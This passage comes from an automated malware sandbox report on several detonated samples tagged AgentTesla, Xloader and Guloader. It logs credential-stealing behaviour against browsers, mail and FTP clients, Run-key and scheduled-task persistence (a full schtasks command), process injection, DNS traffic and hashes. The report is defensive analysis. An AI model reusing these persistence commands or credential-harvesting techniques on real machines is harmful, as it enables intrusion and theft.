| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1940 wrote to memory of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 1940 wrote to memory of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 1940 wrote to memory of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 1940 wrote to memory of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/1540-0-0x0000000000400000-0x0000000000430000-memory.dmp
memory/1540-1-0x0000000000400000-0x0000000000430000-memory.dmp
memory/1540-2-0x0000000000400000-0x0000000000430000-memory.dmp
memory/1540-3-0x0000000000400000-0x0000000000430000-memory.dmp
memory/1540-4-0x0000000000400000-0x0000000000430000-memory.dmp
memory/1540-5-0x0000000002330000-0x00000000023D2000-memory.dmp
memory/1540-7-0x0000000000400000-0x0000000000430000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:45
Platform
win7-20241023-en
Max time kernel
148s
Max time network
122s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\hZpzJs = "C:\\Users\\Admin\\AppData\\Roaming\\hZpzJs\\hZpzJs.exe" | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2952 set thread context of 2184 | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | C:\Users\Admin\AppData\Local\Temp\87597.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\emoGDf" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5EE2.tmp"
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
Network
Files
memory/2952-0-0x0000000074D9E000-0x0000000074D9F000-memory.dmp
memory/2952-1-0x0000000000C70000-0x0000000000D26000-memory.dmp
memory/2952-2-0x0000000074D90000-0x000000007547E000-memory.dmp
memory/2952-3-0x00000000003A0000-0x00000000003C2000-memory.dmp
memory/2952-4-0x0000000074D9E000-0x0000000074D9F000-memory.dmp
memory/2952-5-0x0000000074D90000-0x000000007547E000-memory.dmp
memory/2952-6-0x0000000005150000-0x00000000051D8000-memory.dmp
memory/2952-7-0x0000000000740000-0x0000000000780000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp5EE2.tmp
| MD5 | daac346c5a50f645f765f2cf65453f14 |
| SHA1 | 6da4ca472b7e97759b902bed3d7a19f747ae4ee9 |
| SHA256 | 4c8d0315125766701cb0494313f8025cb46619b38e099ab58e14a7d985b34401 |
| SHA512 | 5e10c44ed37fe8aaca52d10bccee8b3e3a07e25f4e7c81538e352600aeceb53678c60b9c3e566f68bfaef73a857f5cc0140950f1f9304a4c9c92f2f7fdef73a4 |
memory/2184-14-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2184-19-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2184-23-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2184-27-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2184-25-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2184-21-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2184-17-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2184-15-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2952-29-0x0000000074D90000-0x000000007547E000-memory.dmp
memory/2184-28-0x0000000074D90000-0x000000007547E000-memory.dmp
memory/2184-30-0x0000000074D90000-0x000000007547E000-memory.dmp
memory/2184-31-0x0000000074D90000-0x000000007547E000-memory.dmp
memory/2184-32-0x0000000074D90000-0x000000007547E000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:45
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hZpzJs = "C:\\Users\\Admin\\AppData\\Roaming\\hZpzJs\\hZpzJs.exe" | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1396 set thread context of 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | C:\Users\Admin\AppData\Local\Temp\87597.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\emoGDf" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5A50.tmp"
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
Files
memory/1396-0-0x00000000748AE000-0x00000000748AF000-memory.dmp
memory/1396-1-0x0000000000330000-0x00000000003E6000-memory.dmp
memory/1396-2-0x0000000004DA0000-0x0000000004E3C000-memory.dmp
memory/1396-3-0x0000000005480000-0x0000000005A24000-memory.dmp
memory/1396-4-0x0000000004F70000-0x0000000005002000-memory.dmp
memory/1396-5-0x0000000004E70000-0x0000000004E7A000-memory.dmp
memory/1396-7-0x0000000005010000-0x0000000005066000-memory.dmp
memory/1396-6-0x00000000748A0000-0x0000000075050000-memory.dmp
memory/1396-8-0x0000000005070000-0x0000000005092000-memory.dmp
memory/1396-9-0x00000000748AE000-0x00000000748AF000-memory.dmp
memory/1396-10-0x00000000748A0000-0x0000000075050000-memory.dmp
memory/1396-11-0x0000000000A30000-0x0000000000AB8000-memory.dmp
memory/1396-12-0x0000000000AC0000-0x0000000000B00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp5A50.tmp
| MD5 | e43640c5dbcf7fba6fb73da824b3155e |
| SHA1 | dd1eb500820a074aada0341f51176460036d0fdd |
| SHA256 | c62ade233f6ed0bca1b725a96a347062f50cbeeed99fdebb417c711446672708 |
| SHA512 | b3aca3f2e2b11feb8e2655a626fe6c3f4a94c6ab93c3c8dee60dbc5b6118d80687c724e4095ee1b5f89b792643e7588ef3d43f03f3c3828768712913c24a2d99 |
memory/1200-18-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1200-20-0x00000000748A0000-0x0000000075050000-memory.dmp
memory/1396-21-0x00000000748A0000-0x0000000075050000-memory.dmp
memory/1200-22-0x00000000748A0000-0x0000000075050000-memory.dmp
memory/1200-23-0x0000000005B00000-0x0000000005B18000-memory.dmp
memory/1200-24-0x0000000006760000-0x00000000067C6000-memory.dmp
memory/1200-25-0x00000000748A0000-0x0000000075050000-memory.dmp
memory/1200-26-0x00000000748A0000-0x0000000075050000-memory.dmp
memory/1200-28-0x0000000006F60000-0x0000000006FB0000-memory.dmp
memory/1200-29-0x00000000748A0000-0x0000000075050000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
142s
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5080 set thread context of 2764 | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
memory/5080-0-0x00000000743FE000-0x00000000743FF000-memory.dmp
memory/5080-1-0x0000000000190000-0x0000000000274000-memory.dmp
memory/5080-2-0x00000000051E0000-0x0000000005784000-memory.dmp
memory/5080-3-0x0000000004CD0000-0x0000000004D62000-memory.dmp
memory/5080-4-0x0000000004C90000-0x0000000004C9A000-memory.dmp
memory/5080-5-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/5080-6-0x0000000004F10000-0x0000000004FAC000-memory.dmp
memory/5080-7-0x0000000005180000-0x00000000051A2000-memory.dmp
memory/5080-8-0x00000000743FE000-0x00000000743FF000-memory.dmp
memory/5080-9-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/5080-10-0x00000000065C0000-0x000000000663A000-memory.dmp
memory/5080-11-0x0000000006640000-0x0000000006672000-memory.dmp
memory/2764-12-0x0000000000400000-0x0000000000428000-memory.dmp
memory/5080-14-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/2764-15-0x0000000001790000-0x0000000001ADA000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240903-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Guloader family
Guloader,Cloudeye
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe
"C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe"
Network
Files
memory/2544-2-0x00000000002D0000-0x00000000002E3000-memory.dmp
memory/2544-3-0x00000000002D0000-0x00000000002E3000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
148s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe
"C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:43
Platform
win7-20241023-en
Max time kernel
0s
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240903-en
Max time kernel
122s
Max time network
128s
Command Line
Signatures
Credentials from Password Stores: Windows Credential Manager
